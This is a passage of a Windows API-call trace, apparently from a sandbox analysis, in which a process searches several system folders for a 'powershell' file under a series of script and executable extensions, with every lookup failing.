	[0511.850] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.851] SetErrorMode (uMode=0x1) returned 0x1
	[0511.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.851] SetErrorMode (uMode=0x1) returned 0x1
	[0511.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.851] SetErrorMode (uMode=0x1) returned 0x1
	[0511.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.851] SetErrorMode (uMode=0x1) returned 0x1
	[0511.851] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.852] SetErrorMode (uMode=0x1) returned 0x1
	[0511.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.852] SetErrorMode (uMode=0x1) returned 0x1
	[0511.852] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.852] SetErrorMode (uMode=0x1) returned 0x1
	[0511.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0511.852] SetErrorMode (uMode=0x1) returned 0x1
	[0511.852] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.853] SetErrorMode (uMode=0x1) returned 0x1
	[0511.853] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.853] SetErrorMode (uMode=0x1) returned 0x1
	[0511.853] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.853] SetErrorMode (uMode=0x1) returned 0x1
	[0511.853] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.853] SetErrorMode (uMode=0x1) returned 0x1
	[0511.853] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.854] SetErrorMode (uMode=0x1) returned 0x1
	[0511.854] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.854] SetErrorMode (uMode=0x1) returned 0x1
	[0511.854] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.854] SetErrorMode (uMode=0x1) returned 0x1
	[0511.854] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.854] SetErrorMode (uMode=0x1) returned 0x1
	[0511.889] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.889] SetErrorMode (uMode=0x1) returned 0x1
	[0511.889] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.889] SetErrorMode (uMode=0x1) returned 0x1
	[0511.890] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.890] SetErrorMode (uMode=0x1) returned 0x1
	[0511.890] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.890] SetErrorMode (uMode=0x1) returned 0x1
	[0511.890] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.890] SetErrorMode (uMode=0x1) returned 0x1
	[0511.890] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.890] SetErrorMode (uMode=0x1) returned 0x1
	[0511.891] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.891] SetErrorMode (uMode=0x1) returned 0x1
	[0511.891] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.891] SetErrorMode (uMode=0x1) returned 0x1
	[0511.891] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.891] SetErrorMode (uMode=0x1) returned 0x1
	[0511.892] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.892] SetErrorMode (uMode=0x1) returned 0x1
	[0511.892] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.892] SetErrorMode (uMode=0x1) returned 0x1
	[0511.892] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.892] SetErrorMode (uMode=0x1) returned 0x1
	[0511.893] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.893] SetErrorMode (uMode=0x1) returned 0x1
	[0511.893] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.893] SetErrorMode (uMode=0x1) returned 0x1
	[0511.893] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.893] SetErrorMode (uMode=0x1) returned 0x1
	[0511.894] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.894] SetErrorMode (uMode=0x1) returned 0x1
	[0511.894] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.894] SetErrorMode (uMode=0x1) returned 0x1
	[0511.894] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.894] SetErrorMode (uMode=0x1) returned 0x1
	[0511.894] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.894] SetErrorMode (uMode=0x1) returned 0x1
	[0511.894] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.895] SetErrorMode (uMode=0x1) returned 0x1
	[0511.895] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.895] SetErrorMode (uMode=0x1) returned 0x1
	[0511.895] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0511.895] SetErrorMode (uMode=0x1) returned 0x1
	[0511.895] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.895] SetErrorMode (uMode=0x1) returned 0x1
	[0511.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.896] SetErrorMode (uMode=0x1) returned 0x1
	[0511.896] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.896] SetErrorMode (uMode=0x1) returned 0x1
	[0511.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.896] SetErrorMode (uMode=0x1) returned 0x1
	[0511.896] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.896] SetErrorMode (uMode=0x1) returned 0x1
	[0511.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.897] SetErrorMode (uMode=0x1) returned 0x1
	[0511.897] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.897] SetErrorMode (uMode=0x1) returned 0x1
	[0511.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.897] SetErrorMode (uMode=0x1) returned 0x1
	[0511.897] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.897] SetErrorMode (uMode=0x1) returned 0x1
	[0511.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.898] SetErrorMode (uMode=0x1) returned 0x1
	[0511.898] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.898] SetErrorMode (uMode=0x1) returned 0x1
	[0511.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.898] SetErrorMode (uMode=0x1) returned 0x1
	[0511.898] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.898] SetErrorMode (uMode=0x1) returned 0x1
	[0511.898] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0511.899] SetErrorMode (uMode=0x1) returned 0x1
	[0511.899] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0511.899] SetErrorMode (uMode=0x1) returned 0x1
	[0511.899] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.525] SetErrorMode (uMode=0x1) returned 0x1
	[0512.525] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.526] SetErrorMode (uMode=0x1) returned 0x1
	[0512.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.526] SetErrorMode (uMode=0x1) returned 0x1
	[0512.526] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.526] SetErrorMode (uMode=0x1) returned 0x1
	[0512.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.527] SetErrorMode (uMode=0x1) returned 0x1
	[0512.527] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0512.527] SetErrorMode (uMode=0x1) returned 0x1
	[0512.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c9dde20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0512.527] SetErrorMode (uMode=0x1) returned 0x1
	[0512.528] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c9ddfc0 | out: lpFindFileData=0x1c9ddfc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
